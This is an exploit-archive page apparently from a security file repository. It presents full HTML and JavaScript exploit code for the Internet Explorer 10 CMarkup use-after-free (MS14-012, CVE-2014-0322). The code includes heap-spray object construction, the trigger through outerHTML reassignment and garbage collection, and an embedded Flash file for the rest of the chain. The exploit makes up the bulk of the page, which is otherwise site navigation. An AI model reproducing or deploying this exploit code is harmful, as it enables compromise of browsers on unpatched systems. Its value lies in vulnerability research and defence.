MS14-012 Internet Explorer CMarkup Use-After-Free

MS14-012 Internet Explorer CMarkup Use-After-Free: Posted Apr 14, 2014; Authored by Jean-Jamil Khalife; Microsoft Internet Explorer CMarkup use-after-free exploit that demonstrates the issue documented in MS14-012.; tags | exploit; advisories | CVE-2014-0322; SHA-256 | c372cfa21ed6ed039af78c69c1242e4a591d2b3c923280149f5e686dbcd28be0; Download | Favorite | View

MS14-012 Internet Explorer CMarkup Use-After-Free

<!--
 MS14-012 Internet Explorer CMarkup Use-After-Free
 Vendor Homepage: http://www.microsoft.com
 Version: IE 10
 Date: 2014-03-31
 Exploit Author: Jean-Jamil Khalife
 Tested on: Windows 7 SP1 x64 (fr, en)
 Flash versions tested: Adobe Flash Player (12.0.0.70, 12.0.0.77)
 Home: http://www.hdwsec.fr
 Blog : http://www.hdwsec.fr/blog/
 MS14-012 / CVE-2014-0322
 
 Generation:
    c:\mxmlc\bin>mxmlc.exe AsXploit.as -o AsXploit.swf
 
 E-DB Note: http://www.exploit-db.com/sploits/32851-AsXploit.as
 
-->
 
<html>
<head>
</head>
<body>
 
<script>
 
var g_arr = [];
var arrLen = 0x250;
 
function dword2data(dword)
{
    var d = Number(dword).toString(16);
    while (d.length < 8)
        d = '0' + d;
 
    return unescape('%u' + d.substr(4, 8) + '%u' + d.substr(0, 4));
}
 
function eXpl()
{
    var a=0;
 
    for (a=0; a < arrLen; a++) {
        g_arr[a] = document.createElement('div');
    }
     
    // Build a new object
    var b = dword2data(0x19fffff3);
    while (b.length < 0x360)
    {
        // mov     eax,dword ptr [esi+98h]
        // ...
        // mov     eax,dword ptr [eax+8]
        // and     dword ptr [eax+2F0h],0FFFFFFBFh
        if (b.length == (0x98 / 2))
        {
            b += dword2data(0x1a000010);
        }
        // mov     ecx,dword ptr [edx+94h]
        // mov     eax,dword ptr [ecx+0Ch]
        else if (b.length == (0x94 / 2))
        {
            b += dword2data(0x1a111111);
        }
        // mov     eax,dword ptr [edx+15Ch]
        // mov     ecx,dword ptr [eax+edx*8]
        else if (b.length == (0x15c / 2))
        {
            b += dword2data(0x42424242);
        }
        else
        {
            b += dword2data(0x19fffff3);
        }
    }
     
    var d = b.substring(0, ( 0x340 - 2 )/2);
     
    // trigger
    try{
        this.outerHTML=this.outerHTML
    }
    catch(e){
         
    }
     
    CollectGarbage();
 
    // Replace freed object
    for (a=0; a < arrLen; a++)
    {
        g_arr[a].title = d.substring(0, d.length);
    }
}
 
// Trigger the vulnerability
function trigger()
{
    var a = document.getElementsByTagName("script");
    var b = a[0];
    b.onpropertychange = eXpl;
    var c = document.createElement('SELECT');
    c = b.appendChild(c);
}
 
 
 
</script>
<embed src=AsXploit.swf width="10" height="10"></embed>
</body>
</html>

Top Authors In Last 30 Days

Red Hat 184 files
Ubuntu 64 files
Debian 22 files
Valentin Lobstein 11 files
nu11secur1ty 9 files
Google Security Research 6 files
Apple 6 files
malvuln 4 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,009)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,174)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,460)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,433)
UNIX (9,390)
UnixWare (187)
Windows (6,648)
Other

MS14-012 Internet Explorer CMarkup Use-After-Free

MS14-012 Internet Explorer CMarkup Use-After-Free

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

MS14-012 Internet Explorer CMarkup Use-After-Free

Share This

MS14-012 Internet Explorer CMarkup Use-After-Free

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems